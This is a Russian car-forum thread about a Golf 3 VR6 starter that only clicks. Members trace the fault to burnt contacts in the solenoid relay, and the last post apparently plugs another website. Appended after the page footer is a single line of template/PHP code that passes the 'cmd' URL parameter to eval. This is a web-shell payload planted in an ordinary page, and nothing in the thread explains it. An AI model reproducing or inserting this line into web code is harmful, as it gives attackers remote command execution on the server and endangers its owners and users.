+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Стартер Не Крутит


  1. #1
    GTI-Racing EasyBoy is on a distinguished road Аватар для EasyBoy
    Регистрация
    02.12.2008
    Машина
    Golf 3 VR6 AAA 92г. механика
    Сообщений
    72
    Проблема следующая:
    Во-первых предыдущий хозяин(сцуко) поставил кнопку, я так понял что он решил сэкономить и не менять замок зажигания и решил проблему за 50рэ...Стояла машинка дня 3, вышел включаю зажигание, нажимаю кнопку, щелчок...не крутит, потыркался потыркался, пошёл лопатить инет. Начал с самого простого(почистил клемму на аккумуляторе) и действительно помогло, закрутил быстрее прежнего. Дня через 3-4 история повторилась, ну думаю чё за фигня опять чистить, открываю, всё чисто, однако не крутит. Замкнул напрямую(ключом гайки коснулся которая провода к стартеру прижимает и самого стартера) - стартер жужжит. Я так понимаю проблема со втягивающим, не подает + на стартер? Поправьте если не прав, какие ещё варианты могут быть? я к сожалению не в курсе если реле щёлкает, то оно рабочее или не обязательно? :D

    P.S.:Аккумулятор живее всех живых 100%

  2. #2
    GTI-Racing EasyBoy is on a distinguished road Аватар для EasyBoy
    Регистрация
    02.12.2008
    Машина
    Golf 3 VR6 AAA 92г. механика
    Сообщений
    72
    похоже живёт своей жизнью...тыркался тыркался...завёл в итоге. погрел, заглушил, пару раз завёл с пол тычка...

  3. #3
    Мимо проходил Автотрейд is on a distinguished road Аватар для Автотрейд
    Регистрация
    22.02.2009
    Сообщений
    28
    <div class='quotetop'>Цитата(EasyBoy &#064; Mar 26 2009, 21&#58;00) <{POST_SNAPBACK}></div><div class='quotemain'>похоже живёт своей жизнью...тыркался тыркался...завёл в итоге. погрел, заглушил, пару раз завёл с пол тычка...[/b][/quote]
    Внутри втягивающего реле есть контакты которые перемыкаются в момент втягивания реле, тем самым подавая питания на стартер... Они у тебя окислились или подгорели... Точно не могу сказать меняется ли отдельно втягивающее реле, но вариана два , или стартер поменять , или втягивающее реле ...

  4. #4
    GTI-Racing EasyBoy is on a distinguished road Аватар для EasyBoy
    Регистрация
    02.12.2008
    Машина
    Golf 3 VR6 AAA 92г. механика
    Сообщений
    72
    <div class='quotetop'>Цитата(Автотрейд &#064; Mar 30 2009, 14&#58;08) <{POST_SNAPBACK}></div><div class='quotemain'>Внутри втягивающего реле есть контакты которые перемыкаются в момент втягивания реле, тем самым подавая питания на стартер... Они у тебя окислились или подгорели... Точно не могу сказать меняется ли отдельно втягивающее реле, но вариана два , или стартер поменять , или втягивающее реле ...[/b][/quote]

    ага, я так и понял что так называемые "пятаки" подгорели...менять отдельно точно можно, пока езжу без проблем...

  5. #5
    В интернет, конечно, легче заглянуть, чем снять и разобрать стартер. Но начинать нужно со второго, техобслуживание ему не повредит. Очень простой механизм, специально больше ничего не подсказываю – будете горды за себя. Или поймете, что автомеханики берут такие бабки ни за что.

  6. #6
    Мимо проходил borrokko is on a distinguished road Аватар для borrokko
    Регистрация
    22.01.2010
    Машина
    Volkswagen Golf 1,6 - 2005
    Сообщений
    35
    Была аналогичная ситуация. На всё про всё, потратил 3 часа времени в гараже "под пиво". Сложностей никаких, зато работает теперь как часики...:)

  7. #7
    GTI-Racing Ignat is on a distinguished road Аватар для Ignat
    Регистрация
    15.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    259
    Всем привет! Стартер в автомобиле — это механизм, назначение которого заключается в воздействии на коленвал с целью его прокручивания, необходимого для запуска двигателя. Мне нужна была замена стартера на ниве 21214, нашел на портале "НиваЭксперт" все про это, вот подробная инструкция.

+ Ответить в теме

Похожие темы

  1. стартер
    от pendel в разделе Golf 4
    Ответов: 8
    Последнее сообщение: 03.07.2023, 11:53
  2. Не крутит стартер - нужна помощь !!!
    от TDI_Power в разделе Электрика
    Ответов: 3
    Последнее сообщение: 15.09.2013, 00:49
  3. Не Крутит Стартер На Горячую
    от Юра в разделе Электрика
    Ответов: 8
    Последнее сообщение: 31.05.2010, 13:55
  4. стартер не крутит
    от nikey в разделе Двигатель
    Ответов: 10
    Последнее сообщение: 23.01.2010, 20:47
  5. Замучил стартер на Г4!
    от Buch в разделе Электрика
    Ответов: 9
    Последнее сообщение: 06.12.2008, 12:13

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}